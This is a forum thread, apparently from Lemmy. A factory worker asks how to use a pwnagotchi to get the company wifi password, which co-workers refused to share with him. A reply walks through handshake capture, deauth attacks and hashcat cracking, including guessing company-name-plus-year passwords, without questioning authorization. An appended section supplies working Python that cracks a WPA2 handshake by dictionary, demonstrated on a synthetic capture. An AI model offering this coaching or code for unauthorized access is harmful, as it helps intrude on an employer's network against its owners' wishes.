So I work at a factory. It’s decent work, pays the bills. But I burn through my monthly data in a week from browsing my phone on breaks. I know there’s company wifi all over the building, but it’s intended for the office drones, not the plebs like me on the factory floor.

Some of the guys I’ve worked with knew the password and could use the wifi, but everyone I asked refused to share the password with me. I guess they didn’t want to risk getting in trouble? 🤷‍♂️

Anyway, a while back I learned about these pwnagotchi things, and from what I’ve found it would be exactly what I need to sniff out the password myself. But is this right?

Could someone who knows more about this tell me if I’m on the right track or not? Would this work, or would something else do better?

For the record, I only browse lemmy and a little Facebook at work, I’m not looking to download a bunch of stuff or bring a laptop to game on or anything. Just want to poke around the internet without using all my monthly data.

  • black0ut@pawb.social · 2 points · 10 hours ago

    Both attacks need to wait a while while sniffing traffic, because they want to capture auth frames.

    In the case of WPA, the periodic auth frames aren’t enough to crack the password, so you need a full auth frame. Those full frames get sent when a device connects to the network, and you need to be listening at that same moment in order to catch it (which is why it takes a while). Tools like aircrack-ng can, additionally, do deauth attacks, which temporarily log a target device off the network. This prompts an immediate automatic log in again, that the user doesn’t even notice, but which sends the full auth frame with the PSK.

    Once you have a PSK, you can crack it with john or hashcat (hashcat is faster, because of GPU acceleration). Strong passwords will be uncrackable, but you do have a chance with small or common passwords. With a relatively mid-low range PC, you can easily get millions of hashes per second, making large dictionaries (12B+ passwords) feasible. If you have an idea of what the password could be (name of the company with maybe a year at the end that will probably be within the last 10 years, for example), it’s trivial to check all possible combinations. Bruteforcing is also possible, but it will be limited to 8-9 characters in length (12-13 if only numerical) before becoming unfeasible.
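To make the mechanics described in the reply above concrete, here is an added example that is not part of the original thread and not code from pwnagotchi, aircrack-ng, hashcat or john. The passphrase itself never goes over the air; what a capture yields is the 4-way handshake (the two nonces, both MAC addresses and an EAPOL-Key frame carrying a MIC), and a cracker guesses passphrases by recomputing PMK (PBKDF2-HMAC-SHA1, 4096 iterations) → PTK (PRF-512) → KCK → MIC for each candidate until one matches. The block below implements exactly that loop against a synthetic handshake, tries the "company name plus a recent year" pattern from the comment, and includes the keyspace arithmetic behind the 8-9 character brute-force limit. Everything in it is constructed for illustration: the SSID `FactoryWiFi`, the MAC addresses, the nonces, the passphrase `Acme2019`, and the 1,000,000 guesses/s rate are all assumptions, not measurements.

```python
import hashlib
import hmac
import os
import struct

# Constructed (synthetic) network parameters; nothing here came from a real capture.
SSID = "FactoryWiFi"
AP_MAC = bytes.fromhex("020000000001")   # Authenticator Address (AA), locally administered
STA_MAC = bytes.fromhex("020000000002")  # Supplicant Address (SPA), locally administered


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    These 4096 iterations are the cost paid per guess and are why passphrase
    length, not capture difficulty, decides whether cracking is feasible."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n built from HMAC-SHA1; expands the PMK into the PTK."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK, the key that authenticates the EAPOL-Key frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return wpa_prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 (supplicant -> AP) with the MIC field (bytes 81:97) zeroed."""
    return struct.pack(">BBHBHHQ32s16s8s8s16sH",
                       1, 3, 95,                     # 802.1X version, type=EAPOL-Key, body length
                       2, 0x010A, 16,                # RSN descriptor, key info (v2, pairwise, MIC), key length
                       1, snonce,                    # replay counter, SNonce
                       b"\0" * 16, b"\0" * 8, b"\0" * 8,  # key IV, key RSC, key ID
                       b"\0" * 16, 0)                # MIC placeholder, key data length


def simulate_capture(true_passphrase):
    """Stand-in for what a sniffer records from a real handshake: MACs, nonces,
    message 2 and its MIC. The passphrase is used only to produce that MIC."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    msg2 = build_eapol_msg2(snonce)
    kck = wpa_ptk(wpa_pmk(true_passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    return {"ssid": SSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": anonce,
            "snonce": snonce, "eapol": msg2, "mic": eapol_mic(kck, msg2)}


def crack_handshake(capture, wordlist):
    """The dictionary attack: for each candidate recompute PMK -> PTK -> KCK -> MIC
    and compare with the captured MIC. Returns the matching passphrase or None."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, capture["ssid"])
        kck = wpa_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def company_year_candidates(names, first_year, last_year):
    """The 'company name plus a recent year' guess pattern, as a small generator."""
    for name in names:
        for year in range(first_year, last_year + 1):
            yield f"{name}{year}"


def brute_force_seconds(alphabet_size, length, guesses_per_second):
    """Time to exhaust the full keyspace alphabet_size**length at a given guess rate."""
    return alphabet_size ** length / guesses_per_second


if __name__ == "__main__":
    cap = simulate_capture("Acme2019")  # constructed handshake for a made-up passphrase
    print("recovered:", crack_handshake(cap, company_year_candidates(["acme", "Acme", "ACME"], 2015, 2024)))
    for alphabet, length in ((10, 12), (26, 8), (95, 8)):  # digits / lowercase / full printable
        days = brute_force_seconds(alphabet, length, 1_000_000) / 86400  # assumed rate
        print(f"{alphabet}^{length} keyspace at 1M guesses/s: {days:,.0f} days")
```

`wpa_pmk` can be checked against the published test vector (passphrase `password`, SSID `IEEE`), and `crack_handshake` only ever sees the MIC, never the passphrase, which is the same position a real cracker is in. Plug different rates into `brute_force_seconds` to see how quickly the full-printable 8-character space outruns any realistic budget while a 12-digit numeric PIN does not.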